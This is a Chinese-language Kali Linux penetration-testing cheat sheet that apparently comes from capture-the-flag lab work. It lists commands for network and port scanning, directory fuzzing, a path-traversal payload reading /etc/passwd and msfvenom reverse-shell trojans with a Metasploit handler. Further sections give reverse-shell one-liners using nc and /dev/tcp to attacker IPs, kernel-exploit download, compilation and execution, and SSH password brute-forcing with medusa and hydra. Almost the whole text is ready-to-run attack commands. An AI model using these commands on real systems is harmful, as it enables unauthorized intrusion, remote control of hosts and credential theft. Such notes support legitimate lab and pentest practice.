1.IP搜寻
查看kali网段: ip addr 、 ifconfig
namp:nmap -sP xxx.xxx.xxx.0/24
netdiscover:netdiscover xxx.xxx.xxx.0/24
arp:arp-scan -l
2.端口扫描
粗略扫描:nmap <IP>
深度扫描:
nmap -A -p- <IP>
nmap -T4 -A -v <IP>
3.指纹探测
whatweb <url>
cmseek -u <url>
4.目录扫描
gobuster
gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b '403,404'
dirb
dirb <url>
dirb <url> -x .php,.zip,.txt,.html 等
5.参数探测
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=index.php
wfuzz -c -u http://192.168.110.131/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt -H "Cookie:PHPSESSID=l5r7estpbj5rrcfapfdhun8v6p"
6.msf木马文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777 -o mshell.php
修改上述的php,生成不同的文件马
生成java jsp木马:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war
木马使用
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
runlinux
/etc/passwd:存放相关用户信息
/etc/knock.conf:ssh保护机制knock的配置文件
/etc/*-release:查看操作系统
sudo -l
查看可以以root权限执行的文件和命令
查看内核
uname -a、uname -rms、hostnamectl
find
find / -name "xxx" 2>/dev/null
su
su user
ls -a
查看所有文件及其相关权限
ssh
ssh user@ip
md5加密
md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'
| od -An -t x1:管道 (|) 将 echo 输出的内容传递给 od(octal dump)命令。-An 参数表示不打印地址,-t x1 表示以十六进制形式输出每个字节。
| tr -d ' ':tr(translate)命令用于删除指定字符,这里的 -d ' ' 表示删除所有空格。
| tr -d '\n':再次使用 tr 命令删除所有的换行符(\n)。openssl解密/加密
echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}
key:密钥的十六进制转码/etc/passwd的用户密码(admin)编译
openssl passwd -1 -salt admin admin
-1 #使用md5加密算法
-salt #自动锚入一个随机参数作为文件内容加密
kali批量处理指令
for i in $(cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done
python交互性shell
python -c 'import pty;pty.spawn("/bin/bash")'
反弹shell
nc -e /bin/bash 192.168.110.129 5555
bash -i >& /dev/tcp/192.168.232.128/1234 0>&1
exp查询
内核提权:searchsploit privilege | grep CentOS (管理系统)
searchexploit xxx
search xxx
内核提权.1
拿到了xxx.c
gcc编译并另存:gcc xxx.c -o yf
(未'shell'之前)msf upload:upload ~/yf ./yf
赋权:chmod +x yf
执行:./yf
内核提权.2
找到xxx.c
放在网站目录:cp xxx.c /var/www/html
kali开启apache服务:service apache2 start
wget下载:wget http:<kali ip>/xxx.c
赋权:chmod 777 xxx.c
gcc编译:gcc xxx.c -o xxx
执行:./xxx
./keystore结合pcap(.p12)文件
keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcatstring
strings bill.png
knock敲门
knock 192.168.110.131 7469 8475 9842
端口监听
nc -lvp 5555
ssh密码爆破
medusa
medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F
hydra
echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh